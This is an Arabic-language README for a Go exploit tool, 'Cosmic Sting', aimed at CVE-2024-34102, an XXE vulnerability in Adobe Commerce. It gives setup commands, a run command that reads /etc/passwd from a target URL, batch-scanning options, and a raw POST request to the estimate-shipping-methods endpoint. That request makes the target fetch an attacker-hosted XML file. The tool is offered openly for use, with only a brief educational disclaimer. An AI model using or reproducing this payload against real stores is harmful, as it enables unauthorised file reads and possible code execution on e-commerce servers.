
أداة استغلال مكتوبة بلغة Go لثغرة CVE-2024-34102، وهي ثغرة XXE في Adobe Commerce تؤدي إلى تنفيذ تعليمات برمجية عن بُعد. تدعم فحص عناوين URL واحدة أو دفعات مع قراءة الملفات عبر SSRF.
Cosmic Sting هي أداة مبنية على Go مصممة لاستغلال CVE-2024-34102، ثغرة تنفيذ التعليمات البرمجية عن بُعد.
إصدارات Adobe Commerce 2.4.7، 2.4.6-p5، 2.4.5-p7، 2.4.4-p8 والإصدارات الأقدم تتأثر بثغرة تقييد غير صحيح لمرجع الكيان الخارجي XML ('XXE') التي قد تؤدي إلى تنفيذ تعليمات برمجية عشوائية. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال مستند XML معدّل يشير إلى كيانات خارجية. لا يتطلب استغلال هذه المشكلة تفاعل المستخدم.
استنساخ المستودع:
git clone https://github.com/bughuntar/CVE-2024-34102.git &&
cd CVE-2024-34102
تثبيت التبعيات (إن وجدت):
go version &&
go mod init cosmic_sting &&
go get github.com/fatih/color &&
go get github.com/google/uuid &&
go get github.com/urfave/cli/v2
لتشغيل الأداة باستخدام URL واحد:
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
-u, --url : URL واحد لاستغلاله.-f, --file : ملف لقراءته عبر SSRF.-l, --list : ملف يحتوي على قائمة URLs لاستغلالها.POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
هذا المشروع غير مرخص، تم إنشاؤه فقط كمشروع شخصي.
المساهمات مرحب بها! يرجى فتح issue أو إرسال pull request لأي تغييرات.
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن لاختبارها.
البروفيسور هنتر --> تابعني على تويتر